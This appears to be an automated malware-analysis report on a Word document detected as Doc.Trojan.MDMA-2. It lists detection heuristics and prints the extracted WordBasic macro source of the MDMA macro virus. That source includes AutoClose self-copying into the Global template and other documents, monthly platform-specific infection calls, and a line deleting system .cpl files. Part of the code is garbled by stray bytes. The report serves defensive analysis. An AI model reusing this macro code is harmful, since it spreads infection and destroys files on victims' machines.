MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits characteristics of a legacy macro virus, specifically the 'RSN MACRO VIRUS' marker and an AutoClose macro. The AutoClose subroutine attempts to install itself and potentially infect other documents, indicating a self-propagation or infection mechanism. The presence of legacy WordBasic macro virus markers and the AutoClose function strongly suggests a malicious intent to spread.
Heuristics 4
-
ClamAV: Doc.Trojan.MDMA-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.MDMA-2
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Attribute VB_Name = "AutoClose"
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2962 bytes |
SHA-256: a612e4926d5a8adabfb0698354e4a493839759f50b0597791fed0b9e0ffecbbe |
|||
|
Detection
ClamAV:
Doc.Trojan.MDMA-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoClose"
Public Sub MAIN()
On Error Resume Next
install
If (WordBasic.Day(WordBasic.Now()) = 1) Then
Select Case get_platform
Case 1
WordBasic.Call "infect_mac"
Case 2
WordBasic.Call "infect_windows"
Case 3
WordBasic.Call "infect_NT"
Case 4
WordBasic.Call "infect_95"
End Select
show_credits
End If
End Sub
Private Sub install()
Dim total
Dim installed
Dim i
On Error Resume Next
total = WordBasic.CountMacros(0)
installed = 0
If total > 0 Then
For i = 1 To total
If WordBasic.[MacroName$](i, 0) = "AutoClose" Then
installed = 1
End If
Next
End If
If installed = 0 Then
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose", 1
Else
total = WordBasic.CountMacros(1)
installed = 0
If total > 0 Then
For i = 1 To total
If WordBasic.[MacroName$](i, 1) = "AutoClose" Then
installed = 1
End If
Next
End If
If installed = 0 Then
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[WindowName$]() + ":AutoClose", 1
End If
End If
End Sub
Private Function get_platform()
On Error Resume Next
If InStr(WordBasic.[AppInfo$](1), "Macintosh") Then
get_platform = 1 'MAC
End If
If WordBasic.[AppInfo$](9) <> "0" Then
get_platform = 2 'old version of windows
End If
If InStr(WordBasic.[GetSystemInfo$](21), "NT") Then
get_platform = 3 'Win������� , "rk\Logon j ProcessLoginScript j 00 j
WordBasic.Kill "c:\windows\system\*.cpl"
End If
End Sub
Private Sub show_credits()
On Error Resume Next
WordBasic.MsgBox "You are infected with MDMA_DMV. Brought to you by MDMA (Many Delinquent Modern Anarchists).", "MDMA_DMV", 16
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.